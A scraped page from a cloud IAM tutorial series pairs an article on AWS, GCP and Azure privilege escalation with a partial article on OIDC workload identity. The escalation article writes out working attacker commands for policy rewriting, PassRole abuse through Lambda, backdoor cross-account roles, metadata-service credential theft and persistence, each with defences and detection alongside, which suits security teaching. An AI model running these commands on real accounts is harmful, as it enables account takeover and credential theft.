EP10 covers cross-system identity federation — OIDC, SAML, and the trust relationships that let a single IdP authenticate users and workloads across cloud platforms, SaaS applications, and organizational boundaries. Understanding how federation works is also understanding how it can be exploited when trust is too broad.

Next: SAML vs OIDC federation

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

AWS IAM Privilege Escalation: How iam:PassRole Leads to Full Compromise

May 10, 2026April 18, 2026 by Vamshi Krishna Santhapuri

Reading Time: 10 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes → OIDC Workload Identity → AWS IAM Privilege Escalation

TL;DR

Cloud breaches are IAM events — the initial compromise is just the door; the IAM configuration determines how far an attacker goes
iam:PassRole with Resource: * is AWS’s single highest-risk permission — it lets any principal assign any role to any service they can create
iam:CreatePolicyVersion is a one-call path to full account takeover — the attacker rewrites the policy that’s already attached to them
iam.serviceAccounts.actAs in GCP and Microsoft.Authorization/roleAssignments/write in Azure are direct equivalents — same threat model, different syntax
Enforce IMDSv2 on EC2; disable SA key creation in GCP; restrict role assignment scope in Azure
Alert on IAM mutations — they are low-volume, high-signal events that should never be silent

The Big Picture

  AWS IAM PRIVILEGE ESCALATION — HOW LIMITED ACCESS BECOMES FULL COMPROMISE

  Initial credential (exposed key, SSRF to IMDS, phished session)
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  DISCOVERY (read-only, often undetected)                        │
  │  get-caller-identity · list-attached-policies · get-policy     │
  │  Result: attacker maps their permission surface in < 15 min    │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PRIVILEGE ESCALATION — pick one path that's open:             │
  │                                                                 │
  │  iam:CreatePolicyVersion  →  rewrite your own policy to *:*    │
  │  iam:PassRole + lambda    →  invoke code under AdminRole       │
  │  iam:CreateRole +                                              │
  │    iam:AttachRolePolicy   →  create and arm a backdoor role    │
  │  iam:UpdateAssumeRolePolicy → hijack an existing admin role    │
  │  SSRF → IMDS              →  steal instance role credentials   │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  ┌─────────────────────────────────────────────────────────────────┐
  │  PERSISTENCE (before incident response begins)                  │
  │  Create hidden IAM user · cross-account backdoor role          │
  │  Add personal account at org level (GCP)                       │
  │  These survive: password resets, key rotation, even            │
  │  deletion of the original compromised credential               │
  └─────────────────────────────────────────────────────────────────┘
         │
         ▼
  Impact: data exfiltration · destruction · ransomware · mining

AWS IAM privilege escalation follows a consistent pattern across almost every significant cloud breach: a limited initial credential, a chain of IAM permissions that expand access, and damage that’s proportional to how much room the IAM design gave the attacker to move. This episode maps the paths — as concrete techniques with specific permissions, because defending against them requires understanding exactly what they exploit.

Introduction

AWS IAM privilege escalation turns misconfigured permissions into full account compromise — and the entry point is rarely the attack that matters. In 2019, Capital One suffered a breach that exposed over 100 million customer records. The attacker didn’t find a zero-day. They exploited an SSRF vulnerability in a web application firewall, reached the EC2 instance metadata service, retrieved temporary credentials for the instance’s IAM role, and found a role with sts:AssumeRole permissions that let it assume a more powerful role. That more powerful role had access to S3 buckets containing customer data.

The SSRF got the attacker a foothold. The IAM design determined how far they could go.

This is the pattern across almost every significant cloud breach: a limited initial credential, followed by a privilege escalation path through IAM, followed by the actual damage. The damage is determined not by the sophistication of the initial compromise but by how much room the IAM configuration gives an attacker to move.

This episode maps the paths. Not as theory — as concrete techniques with specific permissions, because understanding exactly what an attacker can do with a specific IAM misconfiguration is the only way to prioritize what to fix. The defensive controls are listed alongside each path because that’s where they’re most useful.

The Attack Chain

Most cloud account compromises follow a consistent pattern:

Initial Access
  (compromised credential — exposed access key, SSRF to IMDS,
   compromised developer workstation, phished IdP session)
    │
    ▼
Discovery
  (what am I? what can I do? what can I reach?)
    │
    ▼
Privilege Escalation
  (use existing permissions to gain more permissions)
    │
    ▼
Lateral Movement
  (access other accounts, services, resources)
    │
    ▼
Persistence
  (create backdoor identities that survive credential rotation)
    │
    ▼
Impact
  (data exfiltration, destruction, ransomware, crypto mining)

Understanding this chain tells you where to put defensive controls. You can cut the chain at any link. The earlier the better — but it’s better to have multiple cuts than to assume a single control holds.

Phase 1: Discovery — An Attacker’s First Steps

The moment an attacker has any cloud credential, they enumerate. This is low-noise, uses only read permissions, and in many environments goes completely undetected:

# AWS: establish identity
aws sts get-caller-identity
# Returns: Account, UserId, Arn — tells the attacker what they're working with

# Enumerate attached policies
aws iam list-attached-user-policies --user-name alice
aws iam list-user-policies --user-name alice
aws iam list-groups-for-user --user-name alice
aws iam list-attached-role-policies --role-name LambdaRole

# Read the actual policy document
aws iam get-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevAccess \
  --version-id v1

# Survey what's accessible
aws s3 ls
aws ec2 describe-instances --output table
aws secretsmanager list-secrets
aws ssm describe-parameters

# GCP: establish identity and permissions
gcloud auth list
gcloud projects get-iam-policy PROJECT_ID --format=json | \
  jq '.bindings[] | select(.members[] | contains("[email protected]"))'

# Test specific permissions
gcloud projects test-iam-permissions PROJECT_ID \
  --permissions="storage.objects.list,iam.roles.create,iam.serviceAccountKeys.create"

# Azure: establish context
az account show
az role assignment list --assignee [email protected] --all --output table

All of this is read-only. In most environments I’ve reviewed, there are no alerts on this activity unless the calls come from an unusual IP or at an unusual time. An attacker comfortable with the AWS CLI can map the permission surface of a compromised credential in 10–15 minutes.

AWS Privilege Escalation Paths

Path 1: iam:CreatePolicyVersion

The most direct path. If a principal can create a new version of a policy attached to themselves, they can rewrite it to grant anything.

# Attacker has iam:CreatePolicyVersion on a policy attached to their own role
aws iam create-policy-version \
  --policy-arn arn:aws:iam::123456789012:policy/DevPolicy \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [{"Effect": "Allow", "Action": "*", "Resource": "*"}]
  }' \
  --set-as-default
# Result: DevPolicy now grants AdministratorAccess to everyone with it attached

The attacker doesn’t need to create new infrastructure. They inject admin access directly into their existing permission set. This is often undetected by basic monitoring because CreatePolicyVersion is a low-frequency legitimate operation.

Defence: Alert on every CreatePolicyVersion call. Restrict the permission to a dedicated break-glass IAM role. Use permissions boundaries on developer roles to cap the maximum permissions they can ever hold.

Path 2: iam:PassRole + Service Creation

iam:PassRole allows an identity to assign an IAM role to an AWS service. This is legitimate and necessary — it’s how you configure “this Lambda function runs with this role.” The attack vector: if a more powerful role exists in the account, and the attacker can pass it to a service they control and invoke that service, they operate with the more powerful role’s permissions.

# Attacker has: lambda:CreateFunction + iam:PassRole + lambda:InvokeFunction
# They know an existing AdminRole exists (discovered during enumeration)

# Create a Lambda that runs with AdminRole
aws lambda create-function \
  --function-name exfil-fn \
  --runtime python3.12 \
  --role arn:aws:iam::123456789012:role/AdminRole \
  --handler index.handler \
  --zip-file fileb://payload.zip

# Invoke — code now executes with AdminRole's permissions
aws lambda invoke --function-name exfil-fn /tmp/output.json

import boto3

def handler(event, context):
    # Running as AdminRole
    s3 = boto3.client('s3')
    buckets = s3.list_buckets()

    # Create a backdoor access key while we have elevated access
    iam = boto3.client('iam')
    key = iam.create_access_key(UserName='backdoor-user')

    return {"buckets": [b['Name'] for b in buckets['Buckets']], "key": key}

Defence: Scope iam:PassRole to specific role ARNs — never Resource: *. Example:

{
  "Effect": "Allow",
  "Action": "iam:PassRole",
  "Resource": "arn:aws:iam::123456789012:role/LambdaExecutionRole-*"
}

Path 3: iam:CreateRole + iam:AttachRolePolicy

If an attacker can both create a role and attach policies to it, they create a backdoor identity:

# Create a role with a trust policy naming an attacker-controlled principal
aws iam create-role \
  --role-name BackdoorRole \
  --assume-role-policy-document '{
    "Version": "2012-10-17",
    "Statement": [{
      "Effect": "Allow",
      "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
      "Action": "sts:AssumeRole"
    }]
  }'

# Attach AdministratorAccess
aws iam attach-role-policy \
  --role-name BackdoorRole \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess

# Assume it from the attacker's account — persistent cross-account access
aws sts assume-role \
  --role-arn arn:aws:iam::TARGET_ACCOUNT:role/BackdoorRole \
  --role-session-name persistent-access

This is persistence, not just escalation — the backdoor survives password resets, access key rotation, even deletion of the original compromised credential.

Path 4: iam:UpdateAssumeRolePolicy

If an existing high-privilege role already exists, modifying its trust policy to allow the attacker’s principal is faster and quieter than creating a new role:

# Add attacker's principal to the trust policy of an existing AdminRole
aws iam update-assume-role-policy \
  --role-name ExistingAdminRole \
  --policy-document '{
    "Version": "2012-10-17",
    "Statement": [
      {"Effect": "Allow", "Principal": {"Service": "ec2.amazonaws.com"}, "Action": "sts:AssumeRole"},
      {"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::123456789012:user/attacker"}, "Action": "sts:AssumeRole"}
    ]
  }'

The original entry remains intact. A casual review might miss the addition. Trust policy changes should be critical-priority alerts.

Path 5: SSRF to EC2 Instance Metadata

The Capital One path. Any SSRF vulnerability in a web application running on EC2 can retrieve the instance role’s credentials from the metadata service:

Attacker → SSRF → GET http://169.254.169.254/latest/meta-data/iam/security-credentials/
→ Returns role name
→ GET http://169.254.169.254/latest/meta-data/iam/security-credentials/MyAppRole
→ Returns: AccessKeyId, SecretAccessKey, Token (valid up to 6 hours)

Defence: IMDSv2 requires a PUT request first, blocking simple GET-based SSRF:

# Enforce IMDSv2 at instance launch
aws ec2 run-instances \
  --metadata-options HttpTokens=required,HttpPutResponseHopLimit=1

# Enforce org-wide via SCP
{
  "Effect": "Deny",
  "Action": "ec2:RunInstances",
  "Resource": "arn:aws:ec2:*:*:instance/*",
  "Condition": {
    "StringNotEquals": {"ec2:MetadataHttpTokens": "required"}
  }
}

High-Risk AWS Permissions Reference

Permission	Why It’s Dangerous
`iam:PassRole` with `Resource: *`	Assign any role to any service — enables immediate privilege escalation
`iam:CreatePolicyVersion`	Rewrite any policy to grant anything — full account takeover in one API call
`iam:AttachRolePolicy`	Attach AdministratorAccess to any role
`iam:UpdateAssumeRolePolicy`	Add any principal to any role’s trust policy
`iam:CreateAccessKey` on other users	Create persistent credentials for any IAM user
`lambda:UpdateFunctionCode` on privileged Lambda	Inject malicious code into an elevated function
`secretsmanager:GetSecretValue` with `Resource: *`	Read every secret in the account
`ssm:GetParameter` with `Resource: *`	Read all Parameter Store values — often contains credentials
`iam:CreateRole` + `iam:AttachRolePolicy`	Create and arm a backdoor role

GCP Privilege Escalation Paths

iam.serviceAccounts.actAs

GCP’s equivalent of iam:PassRole — and broader. Allows an identity to make any GCP service act as a specified service account:

# Attacker has iam.serviceAccounts.actAs on an admin SA
gcloud --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com \
  iam roles list --project=my-project

# Generate a full access token and call any GCP API as admin-sa
gcloud auth print-access-token \
  --impersonate-service-account=admin-sa@project.iam.gserviceaccount.com

iam.serviceAccountKeys.create

Converts a short-lived identity into a persistent one. Create a key for an admin service account and you have indefinite access:

gcloud iam service-accounts keys create admin-key.json \
  [email protected]
# Valid until explicitly deleted — no expiry by default

# Block this at org level
gcloud org-policies set-policy --organization=ORG_ID - << 'EOF'
name: organizations/ORG_ID/policies/iam.disableServiceAccountKeyCreation
spec:
  rules:
    - enforce: true
EOF

Azure Privilege Escalation Paths

Microsoft.Authorization/roleAssignments/write

If an identity can write role assignments, it can grant itself Owner at any scope it can write to:

az role assignment create \
  --assignee [email protected] \
  --role "Owner" \
  --scope /subscriptions/SUB_ID

Managed Identity Assignment

Attach a high-privilege managed identity to a VM the attacker controls, then retrieve its token via IMDS:

az vm identity assign \
  --name attacker-vm --resource-group rg-attacker \
  --identities /subscriptions/SUB/resourcegroups/rg-prod/providers/\
Microsoft.ManagedIdentity/userAssignedIdentities/admin-identity

# From inside the VM
curl 'http://169.254.169.254/metadata/identity/oauth2/token\
?api-version=2018-02-01&resource=https://management.azure.com/' \
  -H 'Metadata: true'

Persistence — How Attackers Outlast Incident Response

# AWS: hidden IAM user with admin access
aws iam create-user --user-name svc-backup-01
aws iam attach-user-policy \
  --user-name svc-backup-01 \
  --policy-arn arn:aws:iam::aws:policy/AdministratorAccess
aws iam create-access-key --user-name svc-backup-01
# Valid until manually deleted — survives key rotation on other identities

# AWS: cross-account backdoor — hardest to find during IR
aws iam create-role --role-name svc-monitoring-role \
  --assume-role-policy-document '{
    "Principal": {"AWS": "arn:aws:iam::ATTACKER_ACCOUNT:root"},
    "Action": "sts:AssumeRole"
  }'
aws iam attach-role-policy --role-name svc-monitoring-role \
  --policy-arn arn:aws:iam::aws:policy/ReadOnlyAccess

# GCP: add personal account at org level — survives project deletion
gcloud organizations add-iam-policy-binding ORG_ID \
  --member="user:[email protected]" --role="roles/owner"

Cross-account backdoors are particularly resilient — incident responders often focus on the compromised account without auditing trust relationships with external accounts.

Detection — What to Alert On

Activity	Event to Watch	Priority
Role trust policy modified	`UpdateAssumeRolePolicy`	Critical
New IAM user created	`CreateUser`	High
Policy version created	`CreatePolicyVersion`	High
Policy attached to role	`AttachRolePolicy`, `PutRolePolicy`	High
SA key created (GCP)	`google.iam.admin.v1.CreateServiceAccountKey`	High
Role assignment at subscription scope (Azure)	`roleAssignments/write` at `/subscriptions/`	Critical
CloudTrail logging disabled	`StopLogging`, `DeleteTrail`	Critical
`GetSecretValue` at unusual hours	`secretsmanager:GetSecretValue`	Medium

IAM events are low-volume in most accounts. That makes anomaly detection straightforward — a spike in IAM API calls outside business hours from an unusual principal is a strong signal. Configure the critical-priority events as real-time alerts, not just logged events.

⚠ Production Gotchas

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 1 — "We have SCPs, so individual role permissions       ║
║       don't matter as much"                                          ║
║                                                                      ║
║  SCPs set the ceiling. If an SCP allows iam:PassRole, any role      ║
║  with that permission can exploit it regardless of how "scoped"     ║
║  the SCP looks. SCPs and role-level permissions both need to be     ║
║  reviewed — they are independent layers.                            ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 2 — Permissions boundary doesn't stop iam:PassRole     ║
║                                                                      ║
║  A permissions boundary caps what a role can do directly. It does   ║
║  NOT prevent that role from passing a more powerful role to a       ║
║  Lambda or EC2. iam:PassRole escalation bypasses the boundary       ║
║  because the attacker is operating through the service, not         ║
║  directly through the bounded role.                                 ║
║                                                                      ║
║  Fix: scope iam:PassRole to specific ARNs regardless of whether     ║
║  a permissions boundary is in place.                                ║
╚══════════════════════════════════════════════════════════════════════╝

╔══════════════════════════════════════════════════════════════════════╗
║  ⚠  GOTCHA 3 — CloudTrail doesn't log data plane events by default ║
║                                                                      ║
║  S3 object reads (GetObject), Secrets Manager reads (GetSecretValue)║
║  and SSM GetParameter are data events — not logged by CloudTrail   ║
║  unless you explicitly enable Data Events. An attacker exfiltrating ║
║  data via these calls leaves no trace in a default CloudTrail       ║
║  configuration.                                                      ║
║                                                                      ║
║  Fix: enable S3 and Lambda data events in CloudTrail. At minimum    ║
║  enable logging for secretsmanager:GetSecretValue.                  ║
╚══════════════════════════════════════════════════════════════════════╝

Quick Reference

┌──────────────────────────────────┬──────────────────────────────────────────────────────┐
│ Permission                       │ Escalation Path                                      │
├──────────────────────────────────┼──────────────────────────────────────────────────────┤
│ iam:CreatePolicyVersion          │ Rewrite your own policy to grant *:*                 │
│ iam:PassRole (Resource: *)       │ Assign AdminRole to a Lambda/EC2 you control         │
│ iam:CreateRole+AttachRolePolicy  │ Create and arm a backdoor cross-account role         │
│ iam:UpdateAssumeRolePolicy       │ Hijack existing admin role's trust policy            │
│ iam.serviceAccounts.actAs (GCP)  │ Impersonate any service account including admins     │
│ iam.serviceAccountKeys.create    │ Generate permanent key for any SA                    │
│ roleAssignments/write (Azure)    │ Assign Owner to yourself at subscription scope       │
└──────────────────────────────────┴──────────────────────────────────────────────────────┘

Defensive commands:
┌────────────────────────────────────────────────────────────────────────────────────────┐
│  # AWS — find all roles with iam:PassRole on Resource: *                              │
│  aws iam list-policies --scope Local --query 'Policies[*].Arn' --output text | \     │
│    xargs -I{} aws iam get-policy-version \                                            │
│      --policy-arn {} --version-id v1 --query 'PolicyVersion.Document'                │
│                                                                                        │
│  # AWS — check who can assume a given role                                            │
│  aws iam get-role --role-name AdminRole \                                             │
│    --query 'Role.AssumeRolePolicyDocument'                                            │
│                                                                                        │
│  # AWS — simulate whether a principal can CreatePolicyVersion                        │
│  aws iam simulate-principal-policy \                                                  │
│    --policy-source-arn arn:aws:iam::ACCOUNT:role/DevRole \                           │
│    --action-names iam:CreatePolicyVersion \                                           │
│    --resource-arns arn:aws:iam::ACCOUNT:policy/DevPolicy                             │
│                                                                                        │
│  # GCP — check who has actAs on a service account                                    │
│  gcloud iam service-accounts get-iam-policy SA_EMAIL \                               │
│    --format=json | jq '.bindings[] | select(.role=="roles/iam.serviceAccountUser")'  │
│                                                                                        │
│  # GCP — list service account keys (find persistent backdoors)                       │
│  gcloud iam service-accounts keys list --iam-account=SA_EMAIL                        │
│                                                                                        │
│  # Azure — list all role assignments at subscription scope                           │
│  az role assignment list --scope /subscriptions/SUB_ID --output table                │
└────────────────────────────────────────────────────────────────────────────────────────┘

Framework Alignment

Framework	Reference	What It Covers Here
CISSP	Domain 6 — Security Assessment and Testing	IAM attack paths are the foundation of cloud penetration testing and access review methodology
CISSP	Domain 5 — Identity and Access Management	Defensive IAM design requires understanding offensive technique — you cannot protect paths you don’t know exist
ISO 27001:2022	8.8 Management of technical vulnerabilities	IAM misconfigurations are technical vulnerabilities — identifying and remediating privilege escalation paths
ISO 27001:2022	8.16 Monitoring activities	Detection signals and alerting on IAM mutations as part of continuous monitoring
SOC 2	CC7.1	Threat and vulnerability identification — this episode maps the threat model for cloud IAM
SOC 2	CC6.1	Understanding attack paths informs the design of logical access controls that actually hold

Key Takeaways

Cloud breaches are IAM events — the initial compromise is just the door; IAM misconfigurations determine how far an attacker can go
iam:PassRole with Resource: * is AWS’s highest-risk single permission — scope it to specific role ARNs or the escalation paths multiply
iam:CreatePolicyVersion and iam:UpdateAssumeRolePolicy are privilege escalation and persistence primitives — restrict them to dedicated admin roles
iam.serviceAccounts.actAs in GCP and roleAssignments/write in Azure are direct equivalents — same threat model, cloud-specific syntax
Enforce IMDSv2 on EC2; disable SA key creation org-wide in GCP; restrict role assignment scope in Azure
Enable CloudTrail Data Events — default logging misses S3 reads, Secrets Manager reads, and SSM GetParameter calls entirely
Alert on IAM mutations — low-volume, high-signal events that should never go unmonitored

What’s Next

You now know how attackers move through misconfigured IAM. AWS least privilege audit is the defensive counterpart — using Access Analyzer, GCP IAM Recommender, and Azure Access Reviews to find and right-size over-permissioned access before an attacker does. The goal: get from wildcard policies to scoped, auditable permissions without breaking production.

Next: AWS Least Privilege Audit: From Wildcard Permissions to Scoped Policies

Get EP09 in your inbox when it publishes → linuxcent.com/subscribe

OIDC Workload Identity: Eliminate Cloud Access Keys Entirely

May 10, 2026April 17, 2026 by Vamshi Krishna Santhapuri

Reading Time: 12 minutes

What Is Cloud IAM → Authentication vs Authorization → IAM Roles vs Policies → AWS IAM Deep Dive → GCP Resource Hierarchy IAM → Azure RBAC Scopes → OIDC Workload Identity

TL;DR

Workload identity federation replaces static cloud access keys with short-lived tokens tied to runtime identity — no key to rotate, no secret to leak
The OIDC token exchange pattern is consistent across AWS (IRSA / Pod Identity), GCP (Workload Identity), and Azure (AKS Workload Identity) — learn one, translate the others
AWS EKS: use Pod Identity for new clusters; IRSA is the pattern for existing ones — both eliminate static keys
GCP GKE: --workload-pool at cluster level + roles/iam.workloadIdentityUser binding on the GCP service account
Azure AKS: federated credential on a managed identity + azure.workload.identity/use: "true" pod label
Cross-cloud federation works: an AWS IAM role can call GCP APIs without a GCP key file on the AWS side
Enforce IMDSv2 everywhere; pin OIDC trust conditions to specific service account names; give each workload its own identity

The Big Picture

  WORKLOAD IDENTITY FEDERATION — BEFORE AND AFTER

  ── STATIC CREDENTIALS (the broken model) ────────────────────────────────

  IAM user created → access key generated
         ↓
  Key distributed to pods / CI / servers → stored in Secrets, env vars, .env
         ↓
  Valid indefinitely — never expires on its own
         ↓
  Rotation is manual, painful, deferred ("there's a ticket for that")
         ↓
  Key proliferates across environments — you lose track of every copy
         ↓
  Leaked key → unlimited blast radius until someone notices and revokes it

  ── WORKLOAD IDENTITY FEDERATION (the current model) ─────────────────────

  No key created. No key distributed. No key to rotate.

  Workload starts → requests signed JWT from its native IdP
         │           (EKS OIDC issuer, GitHub Actions, GKE metadata server)
         ↓
  JWT carries workload claims: namespace, service account, repo, instance ID
         ↓
  Cloud STS / token endpoint validates JWT signature + trust conditions
         ↓
  Short-lived credential issued  (AWS STS: 1–12h  |  GCP/Azure: ~1h)
         ↓
  Credential expires automatically — nothing to clean up
         ↓
  Token stolen → usable for 1 hour maximum, audience-bound, not reusable

Workload identity federation is the architectural answer to static credential sprawl. The workload’s proof of identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. The cloud provider never issues a persistent secret. This episode covers how that exchange works across all three clouds and Kubernetes.

Introduction

Workload identity federation eliminates static cloud credentials by replacing them with short-lived tokens that the runtime environment generates and the cloud provider validates against a registered trust relationship. No key to distribute, no rotation schedule to maintain, no proliferation to track.

A while back I was reviewing a Kubernetes cluster that had been running in production for about two years. The team had done good work — solid app code, reasonable cluster configuration. But when I started looking at how pods were authenticating to AWS, I found what I find in roughly 60% of environments I look at.

Twelve service accounts. Twelve access key pairs. Keys created 6 to 24 months ago. Stored as Kubernetes Secrets. Mounted into pods as environment variables. Never rotated because “the app would need to be restarted” and nobody owned the rotation schedule. Two of the keys belonged to AWS IAM users who no longer worked at the company — the users had been deactivated, but the access keys were still valid because in AWS, access keys live independently of console login status.

When I asked who was responsible for rotating these, the answer I got was: “There’s a ticket for that.”

There’s always a ticket for that.

The engineering problem here isn’t that the team was careless. It’s that static credentials are fundamentally unmanageable at scale. Workload identity removes the problem at its root.

Why Static Credentials Are the Wrong Model for Machines

Before getting into solutions, let me be precise about why this is a security problem, not just an operational inconvenience.

Static credentials have four fundamental failure modes:

They don’t expire. An AWS access key created in 2022 is valid in 2026 unless someone explicitly rotates it. GitGuardian’s 2024 data puts the average time from secret creation to detection at 328 days. That’s almost a year of exposure window before anyone even knows.

They lose origin context. When an API call arrives at AWS with an access key, the authorization system can tell you what key was used — not whether it was used by your Lambda function, by a developer debugging something, or by an attacker using a stolen copy. Static credentials are context-blind.

They proliferate invisibly. One key, distributed to a team, copied into three environments, cached on developer laptops, stored in a CI/CD pipeline, pasted into a config file in a test environment that got committed. By the time you need to rotate it, you don’t know all the places it lives.

Rotation is operationally painful. Creating a new key, updating every place the old key lives, removing the old key — while ensuring nothing breaks during the transition — is a coordination exercise that organizations consistently defer. Every month the rotation doesn’t happen is another month of accumulated risk.

Workload identity solves all four by replacing persistent credentials with short-lived tokens that are generated from the runtime environment and verified by the cloud provider against a registered trust relationship.

The OIDC Exchange — What’s Actually Happening

All three major cloud providers have converged on the same underlying mechanism: OIDC token exchange.

Workload (pod, GitHub Actions runner, EC2 instance, on-prem server)
    │
    │  1. Request a signed JWT from the native identity provider
    │     (EKS OIDC server, GitHub's token.actions.githubusercontent.com,
    │      GKE metadata server, Azure IMDS)
    ▼
Native IdP issues a JWT. It contains claims about the workload:
    - What repository triggered this CI run
    - What Kubernetes namespace and service account this pod uses
    - What EC2 instance ID this request came from
    │
    │  2. Workload presents the JWT to the cloud STS / federation endpoint
    ▼
Cloud IAM evaluates:
    - Is the JWT signature valid? (verified against the IdP's public keys)
    - Does the issuer match a registered trust relationship?
    - Do the claims match the conditions in the trust policy?
    │
    │  3. If all checks pass: short-lived cloud credentials issued
    │     (AWS: temporary STS credentials, expiry 1-12 hours)
    │     (GCP: OAuth2 access token, expiry ~1 hour)
    │     (Azure: access token, expiry ~1 hour)
    ▼
Workload calls cloud API with short-lived credentials.
Credentials expire. Nothing to clean up. Nothing to rotate.

No static secret is stored anywhere. The workload’s identity is its runtime environment — the cluster it runs in, the repository it belongs to, the service account it uses. If someone steals the short-lived token, it expires in an hour. If someone tries to use a token for a different resource than it was issued for, the audience claim doesn’t match and it’s rejected.

AWS: IRSA and Pod Identity for EKS

IRSA — The Original Pattern

IRSA (IAM Roles for Service Accounts) federates a Kubernetes service account identity with an AWS IAM role. Each pod’s service account is the proof of identity; AWS issues temporary credentials in exchange for the OIDC JWT.

# Step 1: get the OIDC issuer URL for your EKS cluster
OIDC_ISSUER=$(aws eks describe-cluster \
  --name my-cluster \
  --query "cluster.identity.oidc.issuer" \
  --output text)

# Step 2: register this OIDC issuer with IAM
aws iam create-open-id-connect-provider \
  --url "${OIDC_ISSUER}" \
  --client-id-list sts.amazonaws.com \
  --thumbprint-list "$(openssl s_client -connect ${OIDC_ISSUER#https://}:443 2>/dev/null \
    | openssl x509 -fingerprint -noout | cut -d= -f2 | tr -d ':')"

# Step 3: create an IAM role with a trust policy scoped to a specific service account
ACCOUNT_ID=$(aws sts get-caller-identity --query Account --output text)
OIDC_ID="${OIDC_ISSUER#https://}"

cat > irsa-trust.json << EOF
{
  "Version": "2012-10-17",
  "Statement": [{
    "Effect": "Allow",
    "Principal": {
      "Federated": "arn:aws:iam::${ACCOUNT_ID}:oidc-provider/${OIDC_ID}"
    },
    "Action": "sts:AssumeRoleWithWebIdentity",
    "Condition": {
      "StringEquals": {
        "${OIDC_ID}:sub": "system:serviceaccount:production:app-backend",
        "${OIDC_ID}:aud": "sts.amazonaws.com"
      }
    }
  }]
}
EOF

aws iam create-role \
  --role-name app-backend-s3-role \
  --assume-role-policy-document file://irsa-trust.json

aws iam put-role-policy \
  --role-name app-backend-s3-role \
  --policy-name AppBackendPolicy \
  --policy-document file://app-backend-policy.json

# Step 4: annotate the Kubernetes service account with the role ARN
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    eks.amazonaws.com/role-arn: arn:aws:iam::123456789012:role/app-backend-s3-role

The EKS Pod Identity webhook injects two environment variables into any pod using this service account: AWS_WEB_IDENTITY_TOKEN_FILE pointing to a projected token, and AWS_ROLE_ARN. The AWS SDK reads these automatically. The application doesn’t know any of this is happening — it just calls S3 and it works, using credentials that were never stored anywhere and expire automatically.

The trust policy’s sub condition is the security boundary. system:serviceaccount:production:app-backend means: only pods in the production namespace using the app-backend service account can assume this role. A pod in a different namespace, even with the same service account name, gets a different sub claim and the assumption fails.

EKS Pod Identity — The Simpler Modern Approach

AWS released Pod Identity as a simpler alternative to IRSA. No OIDC provider setup, no manual trust policy with OIDC conditions:

# Enable the Pod Identity agent addon on the cluster
aws eks create-addon \
  --cluster-name my-cluster \
  --addon-name eks-pod-identity-agent

# Create the association — this replaces the OIDC trust policy setup
aws eks create-pod-identity-association \
  --cluster-name my-cluster \
  --namespace production \
  --service-account app-backend \
  --role-arn arn:aws:iam::123456789012:role/app-backend-s3-role

Same result, less ceremony. For new clusters, Pod Identity is the path I’d recommend. IRSA remains important to understand for the many existing clusters already using it.

IAM Roles Anywhere — For On-Premises Workloads

Not everything runs in Kubernetes. For on-premises servers and workloads outside AWS, IAM Roles Anywhere issues temporary credentials to servers that present an X.509 certificate signed by a trusted CA:

# Register your internal CA as a trust anchor
aws rolesanywhere create-trust-anchor \
  --name "OnPremCA" \
  --source sourceType=CERTIFICATE_BUNDLE,sourceData.x509CertificateData="$(base64 -w0 ca-cert.pem)"

# Create a profile mapping the CA to allowed roles
aws rolesanywhere create-profile \
  --name "OnPremServers" \
  --role-arns "arn:aws:iam::123456789012:role/OnPremAppRole" \
  --trust-anchor-arns "${TRUST_ANCHOR_ARN}"

# On the on-prem server — exchange the certificate for AWS credentials
aws_signing_helper credential-process \
  --certificate /etc/pki/server.crt \
  --private-key /etc/pki/server.key \
  --trust-anchor-arn "${TRUST_ANCHOR_ARN}" \
  --profile-arn "${PROFILE_ARN}" \
  --role-arn "arn:aws:iam::123456789012:role/OnPremAppRole"

The server’s certificate (managed by your internal PKI or an ACM Private CA) is the proof of identity. No access key distributed to the server — just a certificate that your CA signed and that you can revoke through your existing certificate revocation infrastructure.

GCP: Workload Identity for GKE

For GKE clusters, Workload Identity is enabled at the cluster level and creates a bridge between Kubernetes service accounts and GCP service accounts:

# Enable Workload Identity on the cluster
gcloud container clusters update my-cluster \
  --workload-pool=my-project.svc.id.goog

# Enable on the node pool (required for the metadata server to work)
gcloud container node-pools update default-pool \
  --cluster=my-cluster \
  --workload-metadata=GKE_METADATA

# Create the GCP service account for the workload
gcloud iam service-accounts create app-backend \
  --project=my-project

SA_EMAIL="[email protected]"

# Grant the GCP SA the permissions it needs
gcloud storage buckets add-iam-policy-binding gs://app-data \
  --member="serviceAccount:${SA_EMAIL}" \
  --role="roles/storage.objectViewer"

# Create the trust relationship: K8s SA → GCP SA
gcloud iam service-accounts add-iam-policy-binding "${SA_EMAIL}" \
  --role=roles/iam.workloadIdentityUser \
  --member="serviceAccount:my-project.svc.id.goog[production/app-backend]"

# Annotate the Kubernetes service account
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-backend
  namespace: production
  annotations:
    iam.gke.io/gcp-service-account: [email protected]

When the pod makes a GCP API call using ADC (Application Default Credentials), the GKE metadata server intercepts the credential request. It validates the pod’s Kubernetes identity, checks the IAM binding, and returns a short-lived GCP access token. The GCP service account key file never exists. There’s nothing to protect, nothing to rotate, nothing to leak.

Azure: Workload Identity for AKS

Azure’s workload identity for Kubernetes replaced the older AAD Pod Identity approach — which required a DaemonSet, had known TOCTOU vulnerabilities, and was operationally fragile. The current implementation uses the OIDC pattern:

# Enable OIDC issuer and workload identity on the AKS cluster
az aks update \
  --name my-aks \
  --resource-group rg-prod \
  --enable-oidc-issuer \
  --enable-workload-identity

# Get the OIDC issuer URL for this cluster
OIDC_ISSUER=$(az aks show \
